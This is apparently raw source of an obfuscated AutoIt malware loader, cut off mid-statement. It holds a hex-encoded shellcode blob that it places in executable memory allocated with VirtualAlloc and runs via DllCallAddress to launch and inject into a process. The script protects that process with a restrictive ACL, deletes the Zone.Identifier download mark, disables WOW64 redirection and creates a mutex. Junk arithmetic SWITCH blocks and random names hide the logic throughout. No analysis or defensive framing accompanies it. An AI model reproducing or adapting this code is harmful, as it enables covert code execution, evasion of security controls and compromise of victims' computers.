$YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "00000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "C0742B25FF0F000003028945EC8BC88B46342904198B4DF08B47340FB74C4A" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0881E1FF0F0000030A0104198B4DF08B42044183E808894DF0D1E83BC872BB" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8FF" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "85C00F84E4FEFFFF33C0897DF4663B4606736C8B7DD083C73C03FE8B07A900" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "000020741985C079046A40EB172500000040F7D81BC083E01083C010EB1585" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E8" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0345F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC872" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "9E33FF68008000005753FF55C485C00F845BFEFFFF576A048D45F8508B85B4" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46280345F88985C0FC" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "FFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C0" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0F840DFEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "050F8677FCFFFF33C05F5E5B8BE55DC20C00" SWITCH 0 CASE (7925 - + 4294964692 = 10529 + 4294962874 + + 4294959561 = + 4294955139 3045 + 4294960943 + + 4294962169 = + 4294958861 ) $OGXVTCHZXQNVYQRDEYYWPBIB += RANDOM ("0" , "255" ) CASE (2409 + 624 + 4246 + + 4294963067 - + 4294966561 = 3785 7513 + 1371 = 8884 + 4294962952 + 8805 + 4097 + 7031 + 6376 = 21965 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (8882 + 2727 = + 4294957873 4116 + 602 + 4294958773 + 4294961678 = 3895 5994 + + 4294965197 = 11609 ) LOCAL $OUBJOAAIMSDPJLUJMOJFFINL = BINARYLEN ($YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) CASE (+ 4294961243 + 4294958471 - + 4294964992 + 4294962080 = + 4294949506 + 4294959522 + 404 + + 4294964677 - + 4294961505 = + 4294963098 + 4294961563 - + 4294966251 - + 4294962875 + 2256 + + 4294960474 = + 4294962463 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (8882 + 2727 = + 4294957873 4116 + 602 + 4294958773 + 4294961678 = 3895 5994 + + 4294965197 = 11609 ) LOCAL $OUBJOAAIMSDPJLUJMOJFFINL = BINARYLEN ($YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) CASE (8882 + 2727 = + 4294957873 4116 + 602 + 4294958773 + 4294961678 = 3895 5994 + + 4294965197 = 11609 ) LOCAL $OUBJOAAIMSDPJLUJMOJFFINL = BINARYLEN ($YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) ENDSWITCH SWITCH 0 CASE (+ 4294966600 + 7090 - + 4294959809 + 4294962820 = 9405 + 4294959344 + + 4294965496 + 2009 - + 4294962875 - + 4294966177 = + 4294965093 6916 + + 4294962665 - + 4294958849 = 10732 ) $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CASE (+ 4294962498 + 4294962390 = + 4294957592 + 4294964324 - + 4294961719 + + 4294965656 = 965 4907 + 1757 - + 4294964039 = 9921 ) $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC ) CASE (309 + 4294959205 + 7287 - + 4294964717 + + 4294965933 = 12871 8311 + 1926 + 2634 = 4144 5037 - + 4294967248 + + 4294966355 = 721 ) LOCAL $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS = DLLCALL ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $OUBJOAAIMSDPJLUJMOJFFINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] CASE (8862 + 5829 - + 4294960137 + + 4294959526 = 14080 + 4294962127 - + 4294966019 + + 4294962453 = + 4294958561 + 4294966551 + 572 + + 4294965902 + 4294966233 + 4294961396 = + 4294958766 ) DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW ["0" ] ) CASE (309 + 4294959205 + 7287 - + 4294964717 + + 4294965933 = 12871 8311 + 1926 + 2634 = 4144 5037 - + 4294967248 + + 4294966355 = 721 ) LOCAL $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS = DLLCALL ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $OUBJOAAIMSDPJLUJMOJFFINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] CASE (309 + 4294959205 + 7287 - + 4294964717 + + 4294965933 = 12871 8311 + 1926 + 2634 = 4144 5037 - + 4294967248 + + 4294966355 = 721 ) LOCAL $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS = DLLCALL ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $OUBJOAAIMSDPJLUJMOJFFINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] ENDSWITCH SWITCH 1 CASE (+ 4294965043 - + 4294964621 = + 4294953643 + 4294962813 + 4294962424 + 3380 + + 4294960182 + + 4294966732 = 5882 58 + 8060 + 1513 + 4294964568 + 4294966275 = 422 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294965264 + 4294964275 + 4294959851 + 4294962215 = + 4294959275 7299 + 4294962842 + 4294964747 + 4294958979 = + 4294960932 5758 + + 4294964802 + 4294963090 + 4294961874 = + 4294949717 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) CASE (+ 4294965306 - + 4294963506 = 1800 + 4294961782 + 4294963782 + + 4294965734 + + 4294961899 = + 4294951309 3933 + 4294961760 + + 4294963591 = + 4294961988 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294965410 + 4294963583 + 1076 - + 4294966607 - + 4294963416 = + 4294966944 + 4294964320 - + 4294964672 = + 4294966891 5433 + 4294961458 = 46 ) FILEWRITE ($PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI , $OUBJOAAIMSDPJLUJMOJFFINARY ) CASE (+ 4294965306 - + 4294963506 = 1800 + 4294961782 + 4294963782 + + 4294965734 + + 4294961899 = + 4294951309 3933 + 4294961760 + + 4294963591 = + 4294961988 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294965306 - + 4294963506 = 1800 + 4294961782 + 4294963782 + + 4294965734 + + 4294961899 = + 4294951309 3933 + 4294961760 + + 4294963591 = + 4294961988 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) ENDSWITCH SWITCH 0 CASE (7107 + 4294961964 - + 4294965832 + 4294960767 = + 4294964006 3076 - + 4294963244 + 4294965267 + + 4294964599 = 2402 + 4294961466 - + 4294965298 - + 4294965909 - + 4294961802 - + 4294964248 = 6097 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (3101 + 5903 + + 4294961352 = 3060 248 + + 4294958552 + 4294966773 + 4294966833 = + 4294957814 8822 + + 4294967071 + + 4294964589 - + 4294958948 + 1518 = 15756 ) LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) CASE (+ 4294962817 + 3445 = + 4294959722 1999 + + 4294960551 + + 4294966814 + + 4294964950 = + 4294950978 + 4294962632 - + 4294965682 + + 4294958511 + + 4294960556 + 2257 = + 4294966262 ) LOCAL $ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ = DLLSTRUCTCREATE ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) CASE (+ 4294962750 + 4294966379 - + 4294961222 = 611 1472 - + 4294967242 + 7108 + 4294958963 = 301 1371 + + 4294966091 - + 4294966662 + + 4294959937 = + 4294960737 ) DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) CASE (+ 4294962817 + 3445 = + 4294959722 1999 + + 4294960551 + + 4294966814 + + 4294964950 = + 4294950978 + 4294962632 - + 4294965682 + + 4294958511 + + 4294960556 + 2257 = + 4294966262 ) LOCAL $ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ = DLLSTRUCTCREATE ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) CASE (+ 4294962817 + 3445 = + 4294959722 1999 + + 4294960551 + + 4294966814 + + 4294964950 = + 4294950978 + 4294962632 - + 4294965682 + + 4294958511 + + 4294960556 + 2257 = + 4294966262 ) LOCAL $ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ = DLLSTRUCTCREATE ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) ENDSWITCH SWITCH 1 CASE (+ 4294961222 - + 4294963097 + 4294962578 = 13108 1619 + 4294961227 - + 4294960673 + 6973 + 3962 = 10575 + 4294966850 + 8364 + 796 + + 4294964952 + 4205 = + 4294960703 ) DIRCREATE ($QCTGPDCYIKISRF ) CASE (+ 4294959983 + + 4294967223 = 6443 1941 + 4294962294 + 4190 - + 4294961982 = 1430 6396 + + 4294962330 = + 4294959910 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (+ 4294963729 + 7806 + 3123 + 4294961728 = 1794 4694 + + 4294959452 = + 4294964146 + 4294965114 + 1423 + 4294965265 + + 4294964428 + 3906 = + 4294965544 ) DLLSTRUCTSETDATA ($UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE , "shellcode" , $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) CASE (3843 + + 4294960851 + + 4294965663 = + 4294959152 7934 + 4294960243 + + 4294962091 + + 4294963476 = 7494 5358 + 4294963861 + 4294963463 - + 4294963727 + 5835 = + 4294963061 ) LOCAL $ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ = DLLSTRUCTCREATE ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) CASE (+ 4294963729 + 7806 + 3123 + 4294961728 = 1794 4694 + + 4294959452 = + 4294964146 + 4294965114 + 1423 + 4294965265 + + 4294964428 + 3906 = + 4294965544 ) DLLSTRUCTSETDATA ($UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE , "shellcode" , $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) CASE (+ 4294963729 + 7806 + 3123 + 4294961728 = 1794 4694 + + 4294959452 = + 4294964146 + 4294965114 + 1423 + 4294965265 + + 4294964428 + 3906 = + 4294965544 ) DLLSTRUCTSETDATA ($UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE , "shellcode" , $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV ) ENDSWITCH SWITCH 1 CASE (3412 + 206 + 4294963675 = 6635 924 + 4294964492 + 8515 = + 4294958085 + 4294960000 + 5800 + 4294959581 = + 4294967293 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) CASE (+ 4294962701 + 4294963774 + 4294966487 = 1031 + 4294962790 - + 4294961759 = 7907 + 4294961124 - + 4294960297 + 7080 = + 4294958370 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (+ 4294960955 + 4294965841 = + 4294959500 2590 + 4294966685 - + 4294964133 = 5142 6474 + 2603 + + 4294958868 - + 4294963799 = 4146 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (+ 4294960059 + 7866 = + 4294964098 5135 - + 4294963660 + 2475 + + 4294958900 + 4294961248 = + 4294961650 1644 + 4294961052 - + 4294966698 + + 4294960016 - + 4294961660 = 629 ) DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) CASE (+ 4294960955 + 4294965841 = + 4294959500 2590 + 4294966685 - + 4294964133 = 5142 6474 + 2603 + + 4294958868 - + 4294963799 = 4146 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (+ 4294960955 + 4294965841 = + 4294959500 2590 + 4294966685 - + 4294964133 = 5142 6474 + 2603 + + 4294958868 - + 4294963799 = 4146 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) ENDSWITCH LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) SWITCH 1 CASE (7298 - + 4294961865 = + 4294961623 + 4294964722 - + 4294961709 + 33 + + 4294958577 = 4116 8417 + 4294962995 = 12729 ) $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CASE (+ 4294963986 + 4294959899 - + 4294966083 + 5981 + 8112 = + 4294967133 + 4294964948 + 1491 + 694 = 9339 3918 - + 4294961875 = 4599 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294966233 + + 4294963562 + 3944 = + 4294966443 1720 + 4294959520 + 372 - + 4294966536 + + 4294965571 = + 4294960647 + 4294959624 - + 4294959469 + 4294961841 + 1313 = + 4294963309 ) LOCAL $TEYOPHYEQKKKOKGBUP = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY ["0" ] ) ["0" ] CASE (+ 4294961476 - + 4294966296 = + 4294963364 + 4294966887 + 4294963773 = 6264 3212 + 4294962446 - + 4294959394 = + 4294962476 ) $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CASE (+ 4294966233 + + 4294963562 + 3944 = + 4294966443 1720 + 4294959520 + 372 - + 4294966536 + + 4294965571 = + 4294960647 + 4294959624 - + 4294959469 + 4294961841 + 1313 = + 4294963309 ) LOCAL $TEYOPHYEQKKKOKGBUP = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY ["0" ] ) ["0" ] CASE (+ 4294966233 + + 4294963562 + 3944 = + 4294966443 1720 + 4294959520 + 372 - + 4294966536 + + 4294965571 = + 4294960647 + 4294959624 - + 4294959469 + 4294961841 + 1313 = + 4294963309 ) LOCAL $TEYOPHYEQKKKOKGBUP = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY ["0" ] ) ["0" ] ENDSWITCH SWITCH 0 CASE (8860 - + 4294959107 + 4294962129 + 4294959184 = 3770 7339 + 4294959342 + 6994 + 4294965291 + 4294958634 = + 4294963008 + 4294959138 + 4294965020 + + 4294958902 = + 4294948468 ) FILEWRITE ($VBSOPEN , $VBS ) CASE (+ 4294967104 + 2342 + 4294965512 - + 4294966499 = 1163 1353 + 4294961089 + 4952 = 98 + 4294959674 + + 4294966538 - + 4294964756 + 2129 = + 4294963585 ) FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) CASE (3233 + 6032 = 9253 4214 + 4294958442 + 1171 - + 4294963366 - + 4294958504 = 9295 + 4294961215 + 6928 + 208 + 8240 = 9265 ) DLLCALL ("kernel32" , "dword" , "VirtualFree" , "dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS , "dword" , "0" , "dword" , "0x8000" ) CASE (+ 4294958480 + 4294961686 + 4294961036 + 4294964830 = + 4294944144 + 4294960498 + 8229 - + 4294960855 - + 4294961678 = 13490 5921 + + 4294960138 + 4294962367 = + 4294961130 ) $OGXVTCHZXQNVYQRDEYYWPBIB += RANDOM ("0" , "255" ) CASE (3233 + 6032 = 9253 4214 + 4294958442 + 1171 - + 4294963366 - + 4294958504 = 9295 + 4294961215 + 6928 + 208 + 8240 = 9265 ) DLLCALL ("kernel32" , "dword" , "VirtualFree" , "dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS , "dword" , "0" , "dword" , "0x8000" ) CASE (3233 + 6032 = 9253 4214 + 4294958442 + 1171 - + 4294963366 - + 4294958504 = 9295 + 4294961215 + 6928 + 208 + 8240 = 9265 ) DLLCALL ("kernel32" , "dword" , "VirtualFree" , "dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS , "dword" , "0" , "dword" , "0x8000" ) ENDSWITCH IF $PROTECT THEN ACL ($TEYOPHYEQKKKOKGBUP ) ENDIF ENDFUNC FUNC ACL ($HANDLE ) PJUVRYUZPYTUIMLJMDVPPVKMAA ("3" , "12000" ) SWITCH 0 CASE (+ 4294962502 + + 4294960372 + 4294962323 + 7936 + + 4294964845 = + 4294956090 + 4294958411 + 2190 + + 4294958493 = + 4294951798 4203 + 4294963201 = 108 ) FILEWRITE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ , $FILE ) CASE (+ 4294958486 - + 4294959410 + 3454 = 2530 + 4294960956 + 5480 = + 4294966436 930 + 4294962915 - + 4294961092 + + 4294963927 = + 4294966680 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (6484 + 3906 + 6536 + + 4294961914 = 16163 6427 + 6647 + + 4294961339 - + 4294961204 + 2954 = + 4294962625 + 4294965132 + 4294967196 + + 4294964807 + 82 = 11544 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CASE (+ 4294962978 - + 4294959005 + 2885 = 6858 + 4294962690 + + 4294960667 = + 4294956061 7254 + 4294961279 - + 4294959295 + 3809 = 13047 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (6484 + 3906 + 6536 + + 4294961914 = 16163 6427 + 6647 + + 4294961339 - + 4294961204 + 2954 = + 4294962625 + 4294965132 + 4294967196 + + 4294964807 + 82 = 11544 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CASE (6484 + 3906 + 6536 + + 4294961914 = 16163 6427 + 6647 + + 4294961339 - + 4294961204 + 2954 = + 4294962625 + 4294965132 + 4294967196 + + 4294964807 + 82 = 11544 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) ENDSWITCH SWITCH 0 CASE (5711 + + 4294963353 + + 4294962146 = + 4294963914 + 4294965436 + 4294958765 + 4294962132 - + 4294965055 + 1278 = + 4294955260 + 4294962075 + 7500 + + 4294962591 = + 4294964870 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (6964 + 4294963467 - + 4294958801 - + 4294959639 = 19287 + 4294958834 + + 4294963702 + 6333 + 4294961781 = + 4294956058 5434 + 2459 - + 4294961225 = 13964 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) CASE (5517 + + 4294964039 + + 4294961367 + 4294960173 + + 4294961351 = + 4294950559 4326 + + 4294958653 + 4294959696 + + 4294965596 = + 4294953679 2340 + 4294961016 = + 4294963356 ) DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW ["0" ] ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) ENDSWITCH SWITCH 1 CASE (+ 4294965133 - + 4294959087 - + 4294962656 + + 4294961061 + + 4294967292 = 13168 7980 + 5188 = + 4294950167 + 4294961843 + + 4294962442 + + 4294960474 = 4447 ) FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) CASE (1866 - + 4294964454 + 4294966641 - + 4294959955 - + 4294967261 = 25822 1779 + 4245 + 3944 - + 4294958818 - + 4294959920 = 4997 + 4294966127 - + 4294960026 + 4294966562 + + 4294966926 = 11429 ) DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) CASE (+ 4294961651 + 4518 = 5364 + 4294967252 - + 4294966140 - + 4294963044 = + 4294959172 + 4294960997 - + 4294965695 + 4294963870 = + 4294966169 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) ENDSWITCH LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] FOR $I = "0" TO "7" DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) NEXT SWITCH 0 CASE (+ 4294959977 - + 4294963916 = + 4294963357 + 4294961920 + 6123 = 747 + 4294959997 + 630 + + 4294966151 + 4294966037 - + 4294962571 = + 4294962948 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294961158 + 2750 + 2114 + + 4294964693 = + 4294963419 5422 + 4807 = 10229 + 4294965925 + 4294961001 + 2689 + 8323 = 3346 ) FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 = 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) CASE (+ 4294960098 + 3745 + 8346 = 4893 + 4294967239 - + 4294962125 + + 4294960308 + 382 = + 4294965804 + 4294962734 + 4294958456 + + 4294960008 + + 4294959082 - + 4294964263 = + 4294941425 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 = 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 